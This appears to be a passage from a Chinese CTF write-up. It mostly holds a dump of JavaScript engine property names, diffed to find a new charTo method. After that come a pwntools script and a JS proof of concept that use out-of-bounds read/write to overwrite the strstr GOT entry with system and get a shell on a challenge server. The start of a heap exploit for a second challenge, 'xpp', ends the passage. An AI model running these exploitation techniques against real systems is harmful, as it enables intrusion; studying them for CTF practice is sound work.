prop:length
prop:setHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toGMTString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toISOString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toJSON
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUTCString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Date
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:global
prop:ignoreCase
prop:lastIndex
prop:multiline
prop:length
prop:source
prop:sticky
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exec
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:test
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:RegExp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:name
prop:length
prop:message
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:EvalError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:RangeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:ReferenceError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:SyntaxError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:TypeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:URIError
prop:Error
prop:E
prop:LN2
prop:LN10
prop:LOG2E
prop:LOG10E
prop:PI
prop:M_PI_2
prop:M_PI_4
prop:M_1_PI
prop:M_2_PI
prop:M_2_SQRTPI
prop:SQRT1_2
prop:SQRT2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:abs
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:acos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:asin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:ceil
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:cos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:floor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:max
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:min
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pow
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:random
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:round
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sqrt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:tan
prop:Math
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:error
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:assert
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:time
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:timeEnd
prop:console
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:run
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:spy
prop:gc
prop:NaN
prop:Infinity
prop:undefined
prop:this
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float64Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isNaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFinite
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseInt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseFloat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:eval'''

b = '''prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:create
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:defineProperties
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyDescriptor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:keys
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getOwnPropertyNames
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:preventExtensions
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isExtensible
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:seal
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isSealed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:freeze
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFrozen
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:hasOwnProperty
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isPrototypeOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:propertyIsEnumerable
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Object
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:prototype
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:apply
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:bind
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:call
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isGenerator
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:Function
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isArray
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pop
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:push
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reverse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:shift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sort
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:splice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:unshift
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:join
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:filter
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:forEach
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:every
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:map
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:some
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduce
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:reduceRight
prop:Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:fromCharCode
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:charCodeAt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:concat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:indexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:lastIndexOf
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:localeCompare
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:match
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:replace
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:search
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:slice
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:split
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substr
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:substring
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLowerCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUpperCase
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trim
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimLeft
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:trimRight
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:String
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:MAX_VALUE
prop:MIN_VALUE
prop:NEGATIVE_INFINITY
prop:POSITIVE_INFINITY
prop:NaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toExponential
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toFixed
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toPrecision
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Number
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Boolean
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:now
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parse
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:UTC
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isDST
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getTimezoneOffset
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCDay
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:getYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setTime
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCDate
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCFullYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCHours
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMilliseconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMinutes
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCMonth
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setUTCSeconds
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:setYear
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toGMTString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toISOString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toJSON
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleDateString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toLocaleTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toTimeString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toUTCString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:valueOf
prop:Date
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:global
prop:ignoreCase
prop:lastIndex
prop:multiline
prop:length
prop:source
prop:sticky
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exec
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:test
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:RegExp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:constructor
prop:length
prop:name
prop:length
prop:message
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:toString
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:EvalError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:RangeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:ReferenceError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:SyntaxError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:TypeError
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:prototype
prop:URIError
prop:Error
prop:E
prop:LN2
prop:LN10
prop:LOG2E
prop:LOG10E
prop:PI
prop:M_PI_2
prop:M_PI_4
prop:M_1_PI
prop:M_2_PI
prop:M_2_SQRTPI
prop:SQRT1_2
prop:SQRT2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:abs
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:acos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:asin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:atan2
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:ceil
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:cos
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:exp
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:floor
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:max
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:min
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:pow
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:random
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:round
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sin
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:sqrt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:tan
prop:Math
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:log
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:error
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:assert
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:time
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:timeEnd
prop:console
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:run
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:info
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:spy
prop:gc
prop:NaN
prop:Infinity
prop:undefined
prop:this
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Float64Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Uint32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int8Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int16Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:Int32Array
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isNaN
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:isFinite
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseInt
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:parseFloat
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:eval
prop:length
prop:FH_VERSION
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:load
prop:prototype
prop:length
prop:name
prop:arguments
prop:caller
prop:length
prop:length
prop:print
'''

a = a.splitlines()
b = b.splitlines()
for i in a:
    if i not in b:
        print(i)

找到新增函数 charTo,charAt有越界读,并且发现 charTo 被修改,存在越界写,需要保证string长度为3

from pwn import *
context.log_level = "debug"
#sh = process(['./ojs'], stdin=PTY)
sh = remote('47.95.3.91', 24377)

#gdb.attach(sh, "b *0x0000000000410C2F")
with open("poc.js", "r") as f:
    for i in f.readlines():
        sh.sendlineafter(">", i)

sh.sendline("cat flag")
sh.interactive()

字符串的 replace 内部会调用 strstr,开局调用一次让 got 表有 libc,然后改 libc 为 system,再触发一次就 RCE 了

a = "ABC";
x = a.charTo(0, 0x11);

sh = "/bin/sh"
sh.replace('x', 'y')

strstr = 0x629290;
offset = strstr - x;

o1 = a.charAt(offset) & 0xff;
o2 = a.charAt(offset + 1) & 0xff;
o3 = a.charAt(offset + 2) & 0xff;

a.charTo(offset, o1 - 0x50)
a.charTo(offset + 1, o2 + 0x4a)
a.charTo(offset + 2, o3 - 0x7)

sh.replace('x', 'y')

xpp

node 结构体

00000000 node            struc ; (sizeof=0x20, mappedto_21)
00000000 left            dq ?                    ; offset
00000008 right           dq ?                    ; offset
00000010 value           dq ?                    ; offset
00000018 id              dq ?
00000020 node            ends

string 结构体

00000000 string          struc ; (sizeof=0x30, mappedto_20)
00000000 cache           db 24 dup(?)
00000018 ptr             dq ?                    ; offset
00000020 len             dq ?
00000028 key             dq ?
00000030 string          ends

EXP

from pwn import *

sh = process('./xpp_bak')

def choice(idx):
    sh.sendlineafter("5. Exit", str(idx))

def add(content):
    choice(1)
    sh.sendlineafter("Content:", content)

def show(key):
    choice(2)
    sh.sendlineafter("Key: ", str(key))

def delete(key):
    choice(3)
    sh.sendlineafter("Key:", str(key))

def edit(key, content):
    choice(4)
    sh.sendlineafter("Key:", str(key))
    sh.sendlineafter("New note:", str(content))

def deprotect(prot):
    mask = 0xfff << (12 * 3)
    ptr_3 = prot & mask
    mask >>= 12
    ptr_2 = (prot & mask) ^ (ptr_3 >> 12)
    mask >>= 12
    ptr_1 = (prot & mask) ^ (ptr_2 >> 12)
    mask >>= 12
    ptr_0 = (prot & mask) ^ (ptr_1 >> 12)
